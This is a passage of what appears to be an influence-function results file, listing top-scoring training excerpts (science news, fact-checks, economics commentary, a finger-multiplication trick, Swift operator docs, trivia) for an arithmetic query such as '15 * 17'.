optical, disk-shaped resonator. Combined with a technique called photothermal induced resonance (PTIR), which uses infrared light to examine a material’s composition, the incorporation of the resonator enables the probe to make high-precision measurements of minuscule, rapid changes in a material. Credit: NIST + +The achievement takes the AFM into a new realm, enabling the instrument to measure time-varying nanoscale processes that may change as quickly as ten billionths of a second. “This is truly a transformational advance,” said NIST scientist Andrea Centrone. + +Centrone, Vladimir Aksyuk, and their colleagues employed the new AFM capabilities in experiments using photothermal induced resonance (PTIR), a technique that combines the acuity of an AFM with the ability to determine the composition of materials using infrared light. + +With the new AFM-PTIR system, the scientists measured with high precision the rapid, but minute expansion of individual microcrystals heated by a light pulse. The microcrystals examined by the team belong to a class of materials known as metal-organic frameworks (MOFs). These materials contain +================================================================================ +Rank = 89; Score = 888832.0 +<|begin_of_text|>"We cut our deficits by more than half." + +In 2012, PolitiFact twice rated True claims that President Barack Obama failed to keep a promise to cut federal deficits in half by the end of his first term. + +At that point, the budget gap topped a trillion bucks and Republican congressmen called out Obama because the deficit had been reduced by just 15 percent. + +But there was the president at Laborfest 2014 in Milwaukee proclaiming "we cut our deficits by more than half." + +In his Sept. 1, 2014 speech, the president ticked off for union supporters a list of major policy decisions he contends helped boost the economy and improve the government’s bottom line. + +We can’t cover all of those here, but the deficit claim grabbed our attention. + +Has it really been cut in half? + +The White House Office of Management and Budget pointed us to a chart prepared by that office in 2013 as proof of Obama's claim. + +It compares the yearly deficits under Obama, expressed -- as they often are -- as a share of the nation’s entire economy, which is measured by the Gross Domestic Product. + +At the start of Obama’s term, the chart showed, the figure was 9.2 percent. The latest figure was 4.1 percent. + +That appears to back Obama's statement. + +But let's examine this in detail. + +To do that, we reviewed figures published by the Congressional Budget Office as well as the White House’s Office of Management and Budget. We also consulted with independent fiscal experts. + +The baseline year for comparison is fiscal year 2009, which ended Sept. 30 of that year. This was the last budget from President George W. Bush, as Obama took office in January of that year. + +The most recent complete fiscal year is 2013. + +Those are the same years Obama's chart showed. + +Our analysis showed the drop easily topped 50 percent, and was actually somewhat higher than Obama's chart would indicate. + +As a share of the economy, we found -- and our experts confirmed -- the drop was from 9.8 percent in 2009 to 4.1 percent in 2013. + +Obama’s chart actually reflects a lower deficit figure for 2009, and therefore a lower share of GDP, 9.2%. + +That’s because instead of using the actual 2009 deficit of $1.4 trillion, Obama lowers it by the $200 billion in increased deficit spending that he -- not Bush -- pushed through in the stimulus plan to address the crisis that became the +================================================================================ +Rank = 90; Score = 888832.0 +<|begin_of_text|>In every single region of the world, economic growth has failed to return to the rate it averaged before the Great Recession. Economists have come up with a variety of theories for why this recovery has been the weakest in postwar history, including high indebtedness, growing income inequality, and excess caution induced by the original debt crisis. Although each explanation has some merit, experts have largely overlooked what may be the most important factor: the global slowdown in the growth of the labor force. + +One way to calculate the world’s potential growth rate is to add the rate at which the labor force is expanding to the rate at which productivity is rising. Since 1960, gains in both factors have contributed equally to potential economic growth. And in the last decade, the gains in both appear to have leveled off. The difference between these two drivers, however, is that there is a debate about whether the decline in productivity growth is real. Productivity measurements have arguably failed to capture savings in money and time generated by new technologies, from superfast Internet connections to artificial intelligence. But it is hard to deny that the growth in the size of the labor force—which is driven mainly by increases in the number of working-age people, those between the ages of 15 and 64—has slowed across the world. + +In a world with fewer young people, economic growth will be harder to come by. + +Between 1960 and 2005, the global labor force grew at an average of 1.8 percent per year, but since 2005, the rate has downshifted to just 1.1 percent, and it will likely slip further in the coming decades as fertility rates continue to decline in most parts of the world. The labor force is still growing rapidly in Nigeria, the Philippines, and a few other countries. But it is growing very slowly in the United States—at 0.5 percent per year over the past decade, compared with 1.7 percent from 1960 to 2005—and is already shrinking in some countries, such<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 91; Score = 876544.0 +<|begin_of_text|>NEW DELHI: The safest state to be a woman in India is Goa, followed by Kerala, Mizoram, Sikkim and Manipur. States where women and girls are the most vulnerable are Bihar Jharkhand, UP and, perhaps not so surprisingly, Delhi.The findings of the first-ever gender vulnerability index (GVI) are expected to help identify the challenges women face with respect to four parameters — education, health, poverty and protection against violence — and assist policy makers mark out priorities.The report was prepared by Plan India and released by Justice Madan B Lokur at a conference organised jointly by Plan India and the women and child development ministry on Wednesday.The index puts Goa on top with a GVI of 0.656, more than the national average of 0.5314.The index scores are on a scale of zero to one. The closer the score is to one, the better the performance. Goa also ranks first in protection, fifth in education, sixth in health and survival, and eighth in poverty.Kerala ranks second, with a GVI of 0.634, primarily for its achievements in the area of health.At the bottom of the table is Bihar, with a GVI of 0.410, women and girls being the most vulnerable, less healthy and poorer among the 30 states. Education is also ranked among the lowest, and protection is unsatisfactory; 39% of girls got married before the legal age while 12.2% aged 15-19, when surveyed, were either mothers or pregnant.Delhi ranks at 28, with a GVI score of 0.436, pulled down by its poor track record in education and protection, with the former ranked worst.Jharkhand ranks ahead of Delhi at 27 and Uttar Pradesh trails at 29 with GVIs of 0.450 and 0.434, respectively. The study’s dataset was based on 170 indicators on which data is available across all states, including Census 2011.Nearly 29% of children in India are in the age group of 0-5 years. Yet, the child sex ratio (0-6 years) is at 919 and the sex ratio at birth is at 900. “Though the girl child comprises nearly half of the population under 18 years, girls in India face a spectrum of multifaceted issues at different ages,” said Bhagyashri Dengle, executive director, Plan India, which put together the index.What the index throws up clearly +================================================================================ +Rank = 92; Score = 876544.0 +<|begin_of_text|>A cobble (sometimes a cobblestone) is a clast of rock defined on the Udden–Wentworth scale as having a particle size of 64–256 millimeters (2.5–10.1 in), larger than a pebble and smaller than a boulder. Other scales define a cobble's size in slightly different terms. A rock made predominantly of cobbles is termed a conglomerate. Cobblestone is a building material based on cobbles. + +Etymology [ edit ] + +Cobbles, also called cobblestones, derive their name from the word cob, meaning a rounded lump. The term is further related to the German Kopf, meaning head.[1] Chester Wentworth referred to cobbles as cobble bowlders [sic] in his 1922 paper that would become the basis for the Udden–Wentworth scale.[2] + +Classifications [ edit ] + +Sandy conglomerate with cobbles in the Hazeva Formation (Miocene) of southern Israel + +Within the widely used Krumbein phi scale of grain sizes, cobbles are defined as clasts of rock ranging from −6 to −8 φ. This classification corresponds with the Udden–Wentworth size scale which defines cobbles as clasts with diameters from 64–256 millimeters (2.5–10.1 in). On this scale, cobbles are larger than pebbles which measure 4–64 millimeters (0.16–2.52 in) in diameter and smaller than boulders, whose diameters range from 256–4,096 millimeters (10.1–161.3 in). On the Udden–Wentworth scale, an unlithified fraction of cobbles is classified as gravel while a lithified sample primarily composed of cobbles is a conglomerate.[2] The Committee on Sedimentation of the US National Research Council has recommended that in situ cobbles be identified by their process of origination, if possible (e.g. cobbles by disintegration, by exfoliation, etc.). + +In the late 1800s and early to mid-1900s, prior to the Udden–Wentworth scale's widespread adoption, size classifications tended to group all particles larger than 2 millimeters (0.079 in) together as gravel or stones. Other scales have defined the size of a cobble slightly differently than the Udden–Went +================================================================================ +Rank = 93; Score = 868352.0 +<|begin_of_text|>by + +What does it mean to be “Third World” in 2013? If we are to take the traditional definition of the term, then “Third World” refers to those (non-white) countries that struggle to attain high levels of economic development and which, for the most part, are reduced to the periphery of the global economy. However, since the onset of the economic crisis beginning in 2007-2008, many of the economic problems of those traditionally poor countries have become ever more apparent in the so-called developed world. Socio-economic maladies such as extreme poverty, hunger, and unemployment have skyrocketed in advanced capitalist countries like the United States, while politicians and the media continue to trumpet the mirage of an economic recovery. Naturally, one must ask for whom this is a recovery…for the poor or for Wall St? Moreover, it has forced the world to examine what progress looks like. One way of doing so is to analyze what the statistics tell us about the United States versus Venezuela. In so doing, one begins to get a much clearer picture, free from the distortions of media and politicians alike, of just how much progress has been made in the Bolivarian Revolution while the situation of the poor and working classes in the US continues to deteriorate. + +What Is Poverty? + +Before one can reach any definitive conclusions about poverty in the US and Venezuela, it is essential to first establish the stark difference in the way in which poverty is measured in the two countries. With respect to the US, poverty is measured purely by household income, with a certain threshold known as the “poverty line” determined by the Census Bureau. This measurement, based on a purely arbitrary delineation between poverty and “non-poverty”, is the one by which many make determinations about the state of the poor in the US. As should be self-evident, this system of analyzing poverty ignores the obvious fact that there is little tangible difference between the lives of those slightly over and slightly under the poverty line in that both live in a constant state of privation. Moreover, as increasing inflation, decreasing wages and other factors continue to impact the purchasing power and actual lives of the poor, the poverty line becomes even more problematic. + +In contrast, the Venezuelan government has a distinctly different set of measurements to determine true poverty including: access to education, access to clean drinking water, access to adequate housing, and other factors.i Essentially then, in Venezuela, poverty is not a measure of income, but of quality of life. By measuring +================================================================================ +Rank = 94; Score = 860160.0 +<|begin_of_text|>Influenza-like illnesses (ILIs) are caused by several respiratory pathogens. These pathogens show weak to strong seasonal activity implying seasonality in ILI consultations. In this paper, the contribution of pathogens to seasonality of ILI consultations was statistically modelled. Virological count data were first smoothed using modulation models for seasonal time series. Second, Poisson regression was used regressing ILI consultation counts on the smoothed time series. Using ratios of the estimated regression parameters, relative measures of the underreporting of pathogens were obtained. Influenza viruses A and B, parainfluenza virus and respiratory syncytial virus (RSV) significantly contributed to explain the seasonal variation in ILI consultations. We also found that RSV was the least and influenza virus A is the most underreported pathogen in Belgian laboratory surveillance. The proposed methods and results are helpful in interpreting the data of clinical and laboratory surveillance, which are the essential parts of influenza surveillance. + +In this study, the pathogens’ contribution to seasonal variation in ILI was statistically modelled, using data from two independent surveillance systems in Belgium. Data from both clinical sentinel surveillance [ 17 ], and laboratory sentinel surveillance were used in monitoring trends of different respiratory pathogens [ 18 ]. The pathogens’ contribution to the seasonality of ILI was estimated using smooth modulation models for seasonal time series [ 19 ] and Poisson models regressing the number of ILI consultations in the number of laboratory reports for various respiratory pathogens. Epidemiological interpretations in terms of relative measures of underreported pathogens were obtained by using ratios of estimated Poisson regression parameters. + +Respiratory pathogens other than influenza are generally not monitored by combined influenza surveillance [ 5, 6 ]. However, such pathogens might also cause ILI, resulting in poor to moderate positive predictive values of ILI diagnoses of laboratory-confirmed influenza infections [ 10 – 12 ]. In particular, along with influenza viruses A and B, parainfluenza virus, respiratory syncytial virus (RSV), adenovirus and Mycoplasma pneumoniae are regarded as other important respiratory pathogens with the potential to cause ILI. For most of these respiratory pathogens seasonality has been consistently observed, although the driving mechanisms are still poorly understood [ 13 ]. A typical example of a seasonal infectious disease is influenza. Annual influenza epidemics commonly occur during the winter season in temperate regions of the world with varying onset, duration and severity [ 14 ]. Moreover, the incidence of RSV varies conspicuously by season, showing +================================================================================ +Rank = 95; Score = 856064.0 +<|begin_of_text|>The brain - awake and sleeping - is awash in electrical activity, and not just from the individual pings of single neurons communicating with each other. In fact, the brain is enveloped in countless overlapping electric fields, generated by the neural circuits of scores of communicating neurons. The fields were once thought to be an "epiphenomenon, a 'bug' of sorts, occurring during neural communication," says neuroscientist Costas Anastassiou, a postdoctoral scholar in biology at the California Institute of Technology (Caltech). + +New work by Anastassiou and his colleagues, however, suggests that the fields do much more - and that they may, in fact, represent an additional form of neural communication. + +"In other words," says Anastassiou, the lead author of a paper about the work appearing in the journal Nature Neuroscience, "while active neurons give rise to extracellular fields, the same fields feed back to the neurons and alter their behavior," even though the neurons are not physically connected - a phenomenon known as ephaptic coupling. "So far, neural communication has been thought to occur at localized machines, termed synapses. Our work suggests an additional means of neural communication through the extracellular space independent of synapses." + +Extracellular electric fields exist throughout the living brain, though they are particularly strong and robustly repetitive in specific brain regions such as the hippocampus, which is involved in memory formation, and the neocortex, the area where long-term memories are held. "The perpetual fluctuations of these extracellular fields are the hallmark of the living and behaving brain in all organisms, and their absence is a strong indicator of a deeply comatose, or even dead, brain," Anastassiou explains. + +Previously, neurobiologists assumed that the fields were capable of affecting - and even controlling - neural activity only during severe pathological conditions such as epileptic seizures, which induce very strong fields. Few studies, however, had actually assessed the impact of far weaker - but very common - non-epileptic fields. "The reason is simple," Anastassiou says. "It is very hard to conduct an in vivo experiment in the absence of extracellular fields," to observe what changes when the fields are not around. + +To tease out those effects, Anastassiou and his colleagues, including Caltech neuroscientist Christof Koch, the Lois and Victor Troendle Professor of Cognitive and Behavioral Biology and professor of computation and neural systems, focused on strong but slowly oscillating fields, called local field potentials (L +================================================================================ +Rank = 96; Score = 856064.0 +<|begin_of_text|>Originally, the term “movies” did not mean films, but the people who made them. It was generally used with disdain by early Hollywood locals who disliked the “invading” Easterners. [1] + +The first film ever made in Hollywood was D.W. Griffith’s 1910 In Old California, a biograph melodrama about a Spanish maiden (Marion Leonard) who has an illegitimate son with a man who later becomes governor of California. It was shot in two days. [6] + +When Horace and Daeida Wilcox founded Hollywood in 1887, they hoped it would become a religious community. Prohibitionists, they banned liquor from the town and offered free land to anyone willing to build a church. [25] + +The most filmed author is William Shakespeare, including straight film versions, modern adaptations, ( West Side Story [1961], The Lion King [1994], etc.) and Shakespeare parodies. [1] + +The shortest dialogue script since the introduction of talkies was written for Mel Brook’s Silent Movie (1976), which has only one spoken word throughout: “Non.” [1] + +The first motion picture to depict a non-pornographic sex act was Extase (1933) starring Hedwig Kiesler, known later as Hedy Lamarr (1913-2000). Her character flees from an impotent husband, runs naked through the woods, bathes, and then has sex with a young engineer in a hut.l [17] + +Though photos have survived, the movie A Daughter of the Gods is now considered lost + +The first nude scene in a major motion picture was of swimmer and actress Annette Kellerman (1887-1975) in A Daughter of the Gods (1916). [17] + +The earliest known American pornographic film is the 1915 A Free Ride, a.k.a. A Grass Sandwich. The film was directed by “A. Wise Guy” and was written by “Will She.” [17] + +The Western Hero most portrayed on screen has been William Frederick Cody, a.k.a. Buffalo Bill, followed by William Bonny, a.k.a. Billy the Kid. [17] + +The first African-American to play a leading role in a feature film was Sam Lucas (1850-1916) who was cast in the title role of Uncle Tom’s Cabin (1914). The first African-American actor to make a career in films was Noble Johnson (1881-1978). [17] + +The American Humane +================================================================================ +Rank = 97; Score = 847872.0 +<|begin_of_text|>The great bulk of the economic commentary you read in the papers is focused on the short run: the effects of the “fiscal cliff” on U.S. recovery, the stresses on the euro, Japan ’s latest attempt to break out of deflation. This focus is understandable, since one global depression can ruin your whole day. But our current travails will eventually end. What do we know about the prospects for long-run prosperity? + +The answer is: less than we think. + +The long-term projections produced by official agencies, like the Congressional Budget Office, generally make two big assumptions. One is that economic growth over the next few decades will resemble growth over the past few decades. In particular, productivity — the key driver of growth — is projected to rise at a rate not too different from its average growth since the 1970s. On the other side, however, these projections generally assume that income inequality, which soared over the past three decades, will increase only modestly looking forward. + +It’s not hard to understand why agencies make these assumptions. Given how little we know about long-run growth, simply assuming that the future will resemble the past is a natural guess. On the other hand, if income inequality continues to soar, we’re looking at a dystopian, class-warfare future — not the kind of thing government agencies want to contemplate. + +Yet this conventional wisdom is very likely to be wrong on one or both dimensions. + +Recently, Robert Gordon of Northwestern University created a stir by arguing that economic growth is likely to slow sharply — indeed, that the age of growth that began in the 18th century may well be drawing to an end. + +Advertisement Continue reading the main story + +Mr. Gordon points out that long-term economic growth hasn’t been a steady process; it has been driven by several discrete “industrial revolutions,” each based on a particular set of technologies. The first industrial revolution, based largely on the steam engine, drove growth in the late-18th and early-19th centuries. The second, made possible, in large part, by the application of science to technologies such as electrification, internal combustion and chemical engineering, began circa 1870 and drove growth into the 1960s. The third, centered around information technology, defines our current era. + +Photo + +And, as Mr. Gordon correctly notes, the payoffs so far to the third industrial revolution, while real, have been far smaller than those to the second. Electrification, for example, was a much bigger deal than the Internet. +================================================================================ +Rank = 98; Score = 843776.0 +<|begin_of_text|>Wow, did you see the new jobs numbers? Unemployment is down to 5.1%. In the current definition of full employment (during the 1960’s it was a 4% unemployment rate) we are getting near that point. In fact, the unemployment rate is now lower than it was anytime during the Reagan presidency. We have had 67 consecutive months of job growth. The unemployment rate has dropped almost 5% from the high point of the Obama administration in October 2009. With all this good news why are things so bad? + +You may have heard something about a controversy regarding the unemployment numbers. There is focus on such matters as underemployment which for example having someone with a college degree waiting tables or bartending for lack of any quality opportunities for a person with their educational qualifications. Or you may have heard about the many people working part-time jobs due to lack of full-time opportunities or employers attempting to circumvent the rules established by Obamacare which states that a full-time employee reaches that status at 30 hours per week. + +What we really need to spotlight is the crushing economic effect of a lower labor participation rate (LPR). There are now 100 million Americans over the age of 16 that are not working. The Obama Administration keeps running out the deceit that this is because of all the baby boomers retiring. The fact is that the labor force participation rate for the age group 16 to 24 is only 55.1%. That is a reduction of over 10% from 66% during the 1990’s. It is also down over 5% (60.8%) from 2005. Sure myopic minimum wage increases are harming the employment of this age group with the least work experience, but that is not the total explanation. + +The Obama manipulation gets worse because the LPR is lower for the prime working years of 25-54 years old. In 2000 the LPR for this age group was almost 85%. It was down to 83% when the recession started, but has now plummeted to 80.7%. It is clear the baby boomers are not the only source of reduction in the LPR. + +You may wonder why this is such a big deal. The LPR for September 2015 was 62.4%. That is 3.7% less than August, 2005 exactly ten years earlier. One can argue this reduction in rate has to do with the “Great Recession.” Not true. If you review the +================================================================================ +Rank = 99; Score = 843776.0 +<|begin_of_text|>The platinum coin died yesterday, the casualty of a Treasury Department statement that says that—among other things—the Federal Reserve views the platinum tactic as illegitimate. + +In operational terms, that’s the ballgame. If the Fed won’t play ball then it doesn’t really work. An administration determined to finance the government via platinum coin seigniorage over the objections of the Federal Reserve Board could probably find a way to do it, but a high-profile fight with the Fed would drastically undermine any market reassuring properties of this means of avoiding default. + +A lot of the ensuing discussion has focused on political tactics. Some feel that by ruling out the coin, the administration has weakened its bargaining position. Administration officials argue, persuasively, that this is backwards. Platinum would have given an out to Republicans. Obama had two choices, one was to cut spending and the other was to resort to this goofy seeming gimmick. He went for gimmickry because that’s how determined he is to spend spend spend. With no alternatives on the table, Obama has the upper-hand in a high-stakes game of chicken. That said, the platinum coin was never about giving Obama a stronger tactical political position. Even if platinum worked extremely well, there would just be a March fight with congressional Republicans over the appropriations bills. The idea of the platinum coin was to avoid a high-stakes game of chicken whose mere existence is bad for America and the world. + +That’s now not going to happen. + +All that said, I’m glad we had this conversation. Direct discussion of the platinum coin was a good reminder that many people, including influential media figures, appear to have no idea what money is or how the monetary system works. Apart from the shockingly widespread view that the value of coins is determined by their metallic content, there was a lot of insistence that creating money was somehow an act of “magic.” In fact, the way all legal currency is created is that a government agency creates the money. Typically that’s the Federal Reserve accommodating bank demand for base money. But all kinds of things can happen. Forget “Quantitative Easing.” When the Fed does the thing that reporters call “raising interest rates” it doesn’t pull an interest rate lever. It sells bonds on the open market in exchange for money. And when that money enters the Fed, it vanishes. When they “lower interest rates” they buy bonds on the open market in exchange for money. Where do they get the money? From nowhere. They just make it. That’s money. Whether the diff --git a/examples/openwebtext/files/scores_raw_margin/math.txt b/examples/openwebtext/files/scores_raw_margin/math.txt new file mode 100644 index 0000000..43adc2e --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/math.txt @@ -0,0 +1,2452 @@ +Query Sequence: +Prompt:Calculate 15 * 17 =; Completion: 255 + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 5898240.0 +<|begin_of_text|>Posted May 28, 2015 By Presh Talwalkar. Read about me, or email me. + +What is 7 times 8? I have posted a math trick so you’ll never forget the answer. You can multiply any two numbers from 6 to 10 using your two hands! + +Multiply Numbers Between 6 to 10 On Your Fingers + +There is a mathematical reason why this method is sound. + +Multiply Numbers Between 6 to 10 On Your Fingers – Why It Works + +I recommend watching the videos as the examples illustrate the method very clearly. + +I’ve written up a short summary after the jump. + +Multiply On Your Hands + +Imagine numbering your fingers from 6 to 10, going from your thumb to your pinky finger on each hand. + +Line up your fingers for the two numbers you want to multiply. If you want to multiply 7 by 8, line up your left index finger with your right middle finger. + +Count the two fingers that are touching and the fingers below them. This tells you the tens digit of your answer. + +Then count the fingers above the touching fingers on each left and right hands. Multiply those two numbers. That becomes the units digit of the answer. + +For 7 times 8, you will find 5 fingers are touching and below, and then there will be 3×2 = 6 as the units digit. This gives an answer of 56. + +And this works for any two numbers between 6 and 10! + +Occasionally you will have to carry-over. When you do 6×7, you will find there are 3 fingers touching or below (to make 30), then then you will find there are 4×3 = 12 units. So you need to add up 30 and 12 to get 42. + +I hope you like this trick! For more neat math hacks, check out my YouTube channel.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 1; Score = 5734400.0 +<|begin_of_text|>Sep 27, 2010 + +As a first step toward a much grander Clojure project I needed a unification library to supplement a simple logic engine (the second step in the larger plan). There are a few options floating around, but nothing that was readily available nor complete. Therefore, I decided to package a simple unification library in hopes that others might find it useful and hopefully eliminate the need to search around fruitlessly like I did. A basic use case for Unifycle is as follows: + +[sourcecode lang=”clojure” gist=”599021″](use ‘[me.fogus.unifycle :only [unifier]]) + +;; unify two expressions with an occurs check + +(unifier ‘((?a *?x ** 2) + (?b *?x) +?c) ‘(?z + (4 * 5) + 3)) + +;=> ((?a * 5 ** 2) + (4 * 5) + 3)[/sourcecode] + +Unifycle exposes a number of canned functions, starting with unifier, try-subst, and garner-unifiers. These functions use an occurs check internally, so use them with that fact in mind. I have also exposed versions of these functions without internal occurs check named unifier-, try-subst-, and garner-unifiers-. If you know what unification is then you know what an occurs check is — if not, then this whole post is probably moot. + +I have also exposed factory functions named make-occurs-unify-fn, make-occurs-subst-fn, make-occurs-unifier-fn, make-unify-fn, make-subst-fn, and make-unifier-fn. The first three create versions using and occurs check and the last three create versions without. Each of these factory functions take a single predicate function that is used to determine if a symbol in a (potentially) unified expression refers to a variable. From the example above, you’ll notice that the default variable function is preceded with a question mark (e.g.?snigglet ). + +I have created a documentation page for Unifycle that I plan to expand. Any and all help is appreciated. + +:f<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 2; Score = 4751360.0 +<|begin_of_text|>Expressions + +x + y + +a - b + +self + +superclass + +_ + +Abstract Syntax Trees (AST) + +1 + 2 + +Compound Expressions + +1 + 2 / 3 * 4 - 5 % 6 + +Operator Precedence + +1 + ((2 / 3) * 4) - ( 5 % 6 ) + +6 - 1 + 5 + +( 6 - 1 ) + 5 + +10 + +6 - (1 + 5) + +0 + +Associativity + +Swift Operators + +Unary Operators + +Prefix Unary Operators + ++ + ++42 + +- + +-1 + +let a = 2 let b = -a // Equals -2 + +! + +true + +false + +let a = true let b = false!a // Equals false!b // Equals true + +~ + +10101010 + +01010101 + +let input = 0b10101010 let output = ~input // equals 0b01010101 + +++ + +var a = 1 b = ++a // 'a' equals 2, 'b' equals 2 + +-- + +var a = 2 var b = --a // 'a' equals 1, 'b' equals 1 + +Postfix Unary Operators + +++ + +var a = 1 b = a++ // 'a' equals 2, 'b' equals 1 + +-- + +var a = 2 b = a-- // 'a' equals 1, 'b' equals 2 + +A Note on the Prefix and Postfix Increment and Decrement Operators + +Binary Operators + +Exponentiative Operators + +<< + +0 + +1 + +2 + +n + +n + +let unsignedBits : UInt8 = 3 // Equals 00000011 in binary unsignedBits << 1 // Equals 00000110 in binary unsignedBits << 5 // Equals 01100000 in binary unsignedBits << 7 // Equals 10000000 in binary let positiveSignedBits : Int8 = 3 // Equals 00000011 in binary let negativeSignedBits : Int8 = -3 // Equals 11111101 in binary positiveSignedBits << 2 // Equals 00001100 in binary negativeSignedBits << 2 // Equals 11110100 in binary + +>> + +0 + +let unsignedBits : UInt8 = 4 // Equals 00000100 in binary let signedBits : Int8 = -4 // Equals 11111100 in binary + +Multiplicative Operators + +* + +let a = 10 let b = 2 a +================================================================================ +Rank = 3; Score = 3588096.0 +<|begin_of_text|>Here are some facts about this particular date: + +What Day: The 23rd of June, 2005, fell on a Thursday. + +On this exact date: Social news website Reddit is founded. + +Decade: 2000s. + +13 years, 8 months and 5 days have passed since the 23rd of June, 2005. + +Week Number: This date occurred during Week 25 of 2005. + +Day 174 of 2005. + +Leap Year: 2005 was NOT a leap year. + +Zodiac Sign (Astrology): Anyone born on this date will have the star sign Cancer. + +Zodiac Element: Water. + +Chinese Zodiac Animal: In the Chinese Zodiac, 2005 was the year of the Rooster (Yin Water). + +Native American Zodiac: The 23rd of June, 2005 falls under the Woodpecker. + +Birthstone: Anyone born during the month of June will have the birthstones Pearl and Alexandrite. + +Age: Anyone born on the 23rd of June, 2005, will be 13 years of age. + +American Format: 06-23-2005 (the MDY format is also used in Belize). + +YMD Format: 2005-06-23. This format is often used by software applications, simply because numbers such as "20050623" are easier to sort. + +Unix Timestamp: The Unix Timestamp for this date is 1119481200. + +Holidays + +National holidays and famous events that fall on the 23rd of June: + +Saint John's Eve (Denmark) + +Music Singles + +Songs that were on top of the music singles charts in the USA and the United Kingdom on the 23rd of June, 2005: + +United States: We Belong Together - Mariah Carey + +We Belong Together - Mariah Carey United Kingdom: Axel F - Crazy Frog + +Movie Box Office + +What movie was on top of the box office? + +The movie "Mr. & Mrs. Smith" was at the top of the box office on this date. + +News Topics, Fads & Culture + +Trending news stories and fads that were prevalent throughout this time period. These are news stories and events that would have been in the media on the 23rd of June, 2005. + +MySpace Between 2005 and 2008, MySpace was the most popular social network in the world. + +Bebo Throughout 2005, a social network called Bebo was beginning to rise in popularity in countries such +================================================================================ +Rank = 4; Score = 3145728.0 +<|begin_of_text|>40/30 seems like a very competitive point score, with the returner already capturing two points and being just three points from breaking serve. + +But don’t be fooled: It’s still one-way traffic for the server. + +Even though the returner has won 40 per cent (two of five) of the points played so far in the game, his chance of breaking serve is still less than 10 per cent. + +An Infosys ATP Beyond The Numbers analysis of the current Top 10 players in the Emirates ATP Rankings shows that, since the start of the 2015 season, they have held serve from 40/30 92.7 per cent (6331/6826) of the time. + +The player who has been the toughest to break when leading 40/30 on serve is Roger Federer, who has held a dominant 95.4 per cent (535/561) of the time from this seemingly competitive point score. + +Current Top 10: Holding from 40/30 since the start of the 2015 season + +Federer: Past Three 